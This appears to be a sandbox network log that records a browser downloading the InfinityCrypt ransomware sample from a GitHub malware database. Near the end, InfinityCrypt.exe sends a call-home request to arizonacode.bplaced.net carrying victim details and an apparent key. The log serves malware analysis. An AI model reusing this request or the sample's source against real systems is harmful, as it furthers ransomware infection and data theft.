GET https://r.bing.com/rp/YelbEmIR9E54rYl4ZRg76rPKz3Q.br.jsHTTP Response
200 -
1.0kB 5.1kB 9 11
-
20.190.160.14:443https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b031797f-09e1-4dfd-903a-acd835355b57&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2269579D85EA2D4E95B5358DAB8D3A2EA2%22%7dtls, http2msedge.exe2.7kB 7.5kB 15 14
HTTP Request
GET https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7&response_type=id_token+code&nonce=b031797f-09e1-4dfd-903a-acd835355b57&redirect_uri=https%3a%2f%2fwww.bing.com%2forgid%2fidtoken%2fconditional&scope=openid%20email%20profile%209ea1ad79-fdb6-4f9a-8bc3-2b70f96e34c7/.default&response_mode=form_post&instance_aware=true&msafed=0&prompt=none&state=%7b%22ig%22%3a%2269579D85EA2D4E95B5358DAB8D3A2EA2%22%7dHTTP Response
200 -
943 B 3.1kB 8 6
-
21.5kB 499.6kB 399 410
HTTP Request
GET https://www.malwarewatch.org/HTTP Response
200HTTP Request
GET https://www.malwarewatch.org/styles/styles.cssHTTP Response
200HTTP Request
GET https://www.malwarewatch.org/scripts/videoList.jsHTTP Response
200HTTP Request
GET https://www.malwarewatch.org/scripts/sideBar.jsHTTP Request
GET https://www.malwarewatch.org/images/logo.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/software.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/library.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/defrag.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/config.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/help.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/users.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/youtube.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/twitter.pngHTTP Request
GET https://www.malwarewatch.org/images/icons/steam.pngHTTP Request
GET https://www.malwarewatch.org/images/backgrounds/background.jpgHTTP Request
GET https://www.malwarewatch.org/images/assets/video_feed/peek.pngHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.malwarewatch.org/video_list.htmlHTTP Request
GET https://www.malwarewatch.org/andrew_video_list.htmlHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://www.malwarewatch.org/malwareHTTP Response
301HTTP Request
GET https://www.malwarewatch.org/images/favicon.ico?v=1.1HTTP Request
GET https://www.malwarewatch.org/malwareHTTP Response
200HTTP Response
301 -
2.1kB 16.6kB 22 22
HTTP Request
GET https://unpkg.com/turbolinks@5.2.0/dist/turbolinks.jsHTTP Response
200 -
2.0kB 17.5kB 20 21
HTTP Request
GET https://use.fontawesome.com/releases/v5.15.2/css/all.cssHTTP Response
200 -
142.250.187.238:443https://www.youtube.com/s/player/1080ef44/player_ias.vflset/en_US/base.jstls, http2msedge.exe24.7kB 916.0kB 478 668
HTTP Request
GET https://www.youtube.com/embed/TUzn_Qo3B3YHTTP Request
GET https://www.youtube.com/s/player/1080ef44/www-player.cssHTTP Request
GET https://www.youtube.com/s/player/1080ef44/player_ias.vflset/en_US/embed.jsHTTP Request
GET https://www.youtube.com/s/player/1080ef44/www-embed-player.vflset/www-embed-player.jsHTTP Request
GET https://www.youtube.com/s/player/1080ef44/player_ias.vflset/en_US/base.js -
19.6kB 651.8kB 368 475
HTTP Request
GET https://i.ytimg.com/vi/-_uBdXbSSgc/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/pwre8oHZdL4/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/jKaajAgnHDg/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/kYVlULPFHsM/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/CQRVpbBESMA/maxresdefault.jpgHTTP Request
GET https://i.ytimg.com/vi/9jCGXIJatwQ/maxresdefault.jpg -
839 B 5.0kB 7 6
-
885 B 5.0kB 8 7
-
885 B 5.0kB 8 7
-
839 B 5.0kB 7 6
-
839 B 5.0kB 7 6
-
1.7kB 6.6kB 13 13
HTTP Request
GET https://googleads.g.doubleclick.net/pagead/id -
142.250.180.10:443https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Createtls, http2msedge.exe1.8kB 6.7kB 15 15
HTTP Request
OPTIONS https://jnn-pa.googleapis.com/$rpc/google.internal.waa.v1.Waa/Create -
216.58.212.225:443https://yt3.ggpht.com/7hrPouLW5CYi764J4yb-urMdfZ2tF9CKWHLHfaggAzYLF-X105xCjpgnShfKSCST5GBFV8EI2BY=s68-c-k-c0x00ffffff-no-rjtls, http2msedge.exe2.0kB 14.9kB 17 18
HTTP Request
GET https://yt3.ggpht.com/7hrPouLW5CYi764J4yb-urMdfZ2tF9CKWHLHfaggAzYLF-X105xCjpgnShfKSCST5GBFV8EI2BY=s68-c-k-c0x00ffffff-no-rj -
216.58.204.68:443https://www.google.com/js/th/9qOIBUG39ay8paWZdcfdyc9gzYxr5h8ybqzR89LD9TM.jstls, http2msedge.exe2.4kB 28.3kB 28 28
HTTP Request
GET https://www.google.com/js/th/9qOIBUG39ay8paWZdcfdyc9gzYxr5h8ybqzR89LD9TM.js -
1.7kB 6.6kB 14 13
HTTP Request
GET https://static.doubleclick.net/instream/ad_status.js -
3.7kB 104.3kB 57 84
HTTP Request
OPTIONS https://github.com/Endermanch/MalwareDatabaseHTTP Response
404 -
142.250.187.206:443https://play.google.com/log?format=json&hasfast=true&authuser=0tls, http2msedge.exe2.1kB 8.7kB 19 20
HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0HTTP Request
OPTIONS https://play.google.com/log?format=json&hasfast=true&authuser=0 -
98 B 52 B 2 1
-
20.26.156.215:443https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.ziptls, http2msedge.exe8.6kB 188.9kB 109 181
HTTP Request
GET https://github.com/Endermanch/MalwareDatabaseHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/security/overall-countHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/used_by_listHTTP Response
204HTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/refs?type=branchHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/branch-and-tag-countHTTP Request
GET https://github.com/opensearch.xmlHTTP Request
GET https://github.com/manifest.jsonHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree/master/ransomwaresHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwaresHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/master/ransomwaresHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwaresHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/blob/master/ransomwares/InfinityCrypt.zipHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/master/ransomwares/InfinityCrypt.zipHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/deferred-metadata/master/ransomwares/InfinityCrypt.zipHTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/raw/refs/heads/master/ransomwares/InfinityCrypt.zipHTTP Response
302 -
185.199.109.133:443https://avatars.githubusercontent.com/u/44542704?v=4&size=40tls, http2msedge.exe5.8kB 136.0kB 80 118
HTTP Request
GET https://avatars.githubusercontent.com/u/44542704?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/51242428?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/39349444?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/17717494?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/63458929?s=64&v=4HTTP Request
GET https://private-user-images.githubusercontent.com/44542704/353824714-9af0a0be-eda5-4826-a3b6-e3ab436cd974.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzgyNzQ5MzEsIm5iZiI6MTczODI3NDYzMSwicGF0aCI6Ii80NDU0MjcwNC8zNTM4MjQ3MTQtOWFmMGEwYmUtZWRhNS00ODI2LWEzYjYtZTNhYjQzNmNkOTc0LnBuZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNTAxMzAlMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjUwMTMwVDIyMDM1MVomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTk1ZTYxNjQ5ZWMwODNlYzEyMmU1MWE0OTRkM2NjYzE1ZTQxNDUyZDIxMTVlMjU0OGJjZDgwNWJlZDQxYmUyY2MmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.cdHPkUb6SOY4ufUj4BAvZLDndHvfnwMjojWvAPs--zoHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://avatars.githubusercontent.com/u/44542704?v=4&size=40HTTP Response
200 -
185.199.109.154:443https://github.githubassets.com/assets/react-code-view-43a423a35a1c.jstls, http2msedge.exe37.6kB 1.1MB 577 928
HTTP Request
GET https://github.githubassets.com/assets/light-7aa84bb7e11e.cssHTTP Request
GET https://github.githubassets.com/assets/dark-f65db3e8d171.cssHTTP Request
GET https://github.githubassets.com/assets/primer-primitives-d9abecd14f1e.cssHTTP Request
GET https://github.githubassets.com/assets/primer-93aded0ee8a1.cssHTTP Request
GET https://github.githubassets.com/assets/global-d579f4a5b443.cssHTTP Request
GET https://github.githubassets.com/assets/github-8049f990d299.cssHTTP Request
GET https://github.githubassets.com/assets/repository-4fce88777fa8.cssHTTP Request
GET https://github.githubassets.com/assets/repos-overview.32a87dc4587d56dcf1eb.module.cssHTTP Request
GET https://github.githubassets.com/assets/notifications-subscriptions-menu.1bcff9205c241e99cff2.module.cssHTTP Request
GET https://github.githubassets.com/assets/primer-react.1cf896b6a5598ae0f649.module.cssHTTP Request
GET https://github.githubassets.com/assets/code-0210be90f4d3.cssHTTP Request
GET https://github.githubassets.com/assets/wp-runtime-98cdc9e8eb60.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_arianotify-polyfill_ariaNotify-polyfill_js-node_modules_github_mi-3abb8f-d7e6bc799724.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-5ecd0f66e629.jsHTTP Request
GET https://github.githubassets.com/assets/environment-31b06b039fca.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_index_mjs-0dbb79f97f8f.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-f690fd9ae3d5.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-f6da4b3fa34c.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-node_modules_github_catalyst_-8e9f78-a74b4e0a8a6b.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-78748950cb0c.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b5f1d7-a1760ffda83d.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_markdown-toolbar-element_dist_index_js-ceef33f593fa.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-c44a69-f0c8a795d1fd.jsHTTP Request
GET https://github.githubassets.com/assets/github-elements-ed51bf4a426a.jsHTTP Request
GET https://github.githubassets.com/assets/element-registry-a7f13d843149.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_githu-bb80ec-72267f4e3ff9.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-be8cb88f481b.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_morphdom_dist_morphdom-e-7c534c-a4a1922eb55f.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-e3cbe28f1638.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-893f9f-6cf3320416b8.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_quote-selection_dist_index_js-node_modules_github_session-resume_-69cfcc-833249ee3034.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_updatable-content_updatable-content_ts-0d1db422e5cc.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_sso_ts-ui_packages-900dde-cab6164e492b.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-83e480198629.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-87a4ae-153d9024e8bd.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-47714e1f448d.jsHTTP Request
GET https://github.githubassets.com/assets/behaviors-ccce079e8d78.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-f6223d90c7ba.jsHTTP Request
GET https://github.githubassets.com/assets/notifications-global-7556bd523830.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-96453a51f920.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-70450e-eecf0d50276f.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-df71139e3900.jsHTTP Request
GET https://github.githubassets.com/assets/codespaces-6b393e6a52d6.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-3eebbd-0763620ad7bf.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_decorators_js-node_modules_delegated-events_di-e161aa-9d41fb1b6c9e.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_remote--3c9c82-7238cfcdaa51.jsHTTP Request
GET https://github.githubassets.com/assets/repositories-8174cf9be44d.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_catalyst_lib_inde-dbbea9-26cce2010167.jsHTTP Request
GET https://github.githubassets.com/assets/code-menu-534f8f82fbb7.jsHTTP Request
GET https://github.githubassets.com/assets/primer-react-6bae0b4b7a9d.jsHTTP Request
GET https://github.githubassets.com/assets/react-core-f38f343438ca.jsHTTP Request
GET https://github.githubassets.com/assets/react-lib-2131e17288a8.jsHTTP Request
GET https://github.githubassets.com/assets/octicons-react-611691cca2f6.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_emotion_is-prop-valid_dist_emotion-is-prop-valid_esm_js-node_modules_emo-62da9f-2df2f32ec596.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_stacktrace-parser_dist_s-e7dcdd-f7cc96ebae76.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover-fn_js-55fea94174bf.jsHTTP Request
GET https://github.githubassets.com/assets/notifications-subscriptions-menu-a1b6f52b86ff.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_ui-commands_ui-commands_ts-006e4d0cf710.jsHTTP Request
GET https://github.githubassets.com/assets/keyboard-shortcuts-dialog-3d37f1665ad7.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-73b675cf164a.jsHTTP Request
GET https://github.githubassets.com/assets/sessions-4f48836d3e05.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-b89b98661809.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_tanstack_query-core_build_modern_queryObserver_js-node_modules_tanstack_-defd52-843b41414e0e.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_aria-live_aria-live_ts-ui_packages_promise-with-resolvers-polyfill_promise-with-r-014121-5fd3ba80197f.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_paths_index_ts-a665ced57b80.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-47d1fc4a26b2.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-530254-10744b983dd4.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_code-view-shared_hooks_use-canonical-object_ts-ui_packages_code-view-shared_hooks-495298-2e8f9997cff5.jsHTTP Request
GET https://github.githubassets.com/assets/repos-overview-6eb9887b8821.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_select-panel-element_ts-6e4d797b78be.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-adc992852f7f.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-2e2c4ea33da2.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-b7767a-9ad7d4eda3d9.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-ce81a738cf2d.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-ui_packages_code-nav_code-nav_ts-ui_packages_filter--8253c1-bd96236c8a65.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_jump-to-element_model_ts-9e49b0faf8a7.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_search_qbsearch-input-element_ts-c43c755e10ab.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_element-entry_ts-c0582f143b1e.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_ghcc-consent-element_element-entry_ts-00da1f94fa19.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_markdown-accessiblity-table-element_element-entry_ts-8b624cefa171.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_combobox-nav_dist-5f477b-eeb221e8a5a3.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_hydro-analytics_hydro-analytics_ts-ui_packages_query-builder-element_element-entry_ts-d09671e2bdec.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_element-entry_ts-9212063ed4b3.jsHTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-362ca569b596.jsHTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_code-view-shared_components_files-search_FileResultsList_tsx-56b769a41ee6.jsHTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/react-code-view.ab7d8fac328c00e5e0cc.module.cssHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_lodash-es__Stack_js-node_modules_lodash-es__Uint8Array_js-node_modules_l-4faaa6-4a736fde5c2f.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_lodash-es__baseIsEqual_js-8929eb9718d5.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_react-reverse-portal_dist_web_index_js-node_modules_primer_live-region-e-18c5ad-0b67a5a18b33.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_copilot-chat_utils_copilot-chat-types_ts-ui_packages_repos-file-tree-view_repos-f-894be6-9b1a09dc11f6.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_diffs_diff-parts_ts-aafebbecabf5.jsHTTP Request
GET https://github.githubassets.com/assets/react-code-view-43a423a35a1c.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200 -
989 B 6.3kB 9 11
-
989 B 6.3kB 9 11
-
989 B 6.3kB 9 11
-
989 B 6.3kB 9 11
-
989 B 6.3kB 9 11
-
98 B 52 B 2 1
-
98 B 52 B 2 1
-
98 B 52 B 2 1
-
98 B 52 B 2 1
-
185.199.109.154:443https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40tls, http2msedge.exe2.8kB 30.4kB 31 40
HTTP Request
GET https://github.githubassets.com/favicons/favicon.svgHTTP Request
GET https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.pngHTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/favicons/favicon.pngHTTP Response
200HTTP Request
GET https://github.githubassets.com/images/gravatars/gravatar-user-420.png?size=40HTTP Response
200 -
21.8kB 10.9kB 47 45
HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Response
204 -
885 B 4.3kB 8 5
-
5.9kB 9.0kB 29 30
HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200 -
185.199.109.133:443https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.ziptls, http2msedge.exe2.4kB 41.5kB 26 41
HTTP Request
GET https://raw.githubusercontent.com/Endermanch/MalwareDatabase/refs/heads/master/ransomwares/InfinityCrypt.zipHTTP Response
200 -
162.55.0.137:80http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7ClQsDNxXx5dg3xXx6uC8xXxXxffxXxhndBxXxwImaxXx%7CMicrosoft%20Windows%2010%20Pro%7C4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134%7C3016httpEndermanch@InfinityCrypt.exe869 B 7.9kB 8 9
HTTP Request
GET http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7ClQsDNxXx5dg3xXx6uC8xXxXxffxXxhndBxXxwImaxXx%7CMicrosoft%20Windows%2010%20Pro%7C4A7DF4FBD275F2737E85CEEB95025C3599DC88654F65DE0D4E5D119535ECF134%7C3016HTTP Response
403 -
88.221.134.250:443https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-UStls, http23.7kB 6.7kB 19 16
HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200 -
23.62.195.195:443https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktoptls, http21.4kB 7.1kB 19 16
HTTP Request
GET https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktopHTTP Response
404
-
54 B 86 B 1 1
DNS Request
bing.com
DNS Response
13.107.21.200204.79.197.200
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
200.21.107.13.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
16.135.221.88.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
74.32.126.40.in-addr.arpa
-
56 B 148 B 1 1
DNS Request
g.bing.com
DNS Response
150.171.28.10150.171.27.10
-
72 B 158 B 1 1
DNS Request
10.28.171.150.in-addr.arpa
-
580 B 9
-
71 B 135 B 1 1
DNS Request
5.114.82.104.in-addr.arpa
-
57 B 318 B 1 1
DNS Request
th.bing.com
DNS Response
88.221.135.188.221.135.2488.221.135.1788.221.135.388.221.135.1688.221.135.988.221.134.388.221.135.1188.221.134.250
-
56 B 316 B 1 1
DNS Request
r.bing.com
DNS Response
88.221.135.4888.221.135.2488.221.135.1688.221.135.2588.221.135.2688.221.135.3588.221.135.3288.221.135.1788.221.135.43
-
71 B 306 B 1 1
DNS Request
login.microsoftonline.com
DNS Response
20.190.160.1420.190.160.12820.190.160.6640.126.32.6820.190.160.2040.126.32.14040.126.32.7240.126.32.74
-
71 B 135 B 1 1
DNS Request
1.135.221.88.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
48.135.221.88.in-addr.arpa
-
66 B 178 B 1 1
DNS Request
www.malwarewatch.org
DNS Response
104.21.96.1104.21.64.1104.21.48.1104.21.32.1104.21.80.1104.21.112.1104.21.16.1
-
55 B 135 B 1 1
DNS Request
unpkg.com
DNS Response
104.17.248.203104.17.247.203104.17.249.203104.17.245.203104.17.246.203
-
65 B 149 B 1 1
DNS Request
use.fontawesome.com
DNS Response
104.21.27.152172.67.142.245
-
72 B 158 B 1 1
DNS Request
14.160.190.20.in-addr.arpa
-
70 B 132 B 1 1
DNS Request
1.96.21.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
152.27.21.104.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
203.248.17.104.in-addr.arpa
-
73 B 142 B 1 1
DNS Request
234.16.217.172.in-addr.arpa
-
61 B 351 B 1 1
DNS Request
www.youtube.com
DNS Response
142.250.187.238142.250.180.14142.250.200.14142.250.200.46172.217.169.46142.250.179.238216.58.212.206172.217.16.238142.250.178.14172.217.169.14142.250.187.206216.58.212.238172.217.169.78216.58.201.110216.58.213.14216.58.204.78
-
57 B 281 B 1 1
DNS Request
i.ytimg.com
DNS Response
216.58.212.214216.58.201.118172.217.169.54172.217.16.246216.58.213.22142.250.200.22142.250.180.22172.217.169.22216.58.204.86142.250.200.54142.250.187.214142.250.187.246142.250.179.246142.250.178.22
-
24.6kB 46.0kB 48 54
-
11.8kB 1.0MB 133 750
-
73 B 89 B 1 1
DNS Request
googleads.g.doubleclick.net
DNS Response
142.250.187.194
-
72 B 169 B 1 1
DNS Request
67.204.58.216.in-addr.arpa
-
74 B 113 B 1 1
DNS Request
238.187.250.142.in-addr.arpa
-
73 B 173 B 1 1
DNS Request
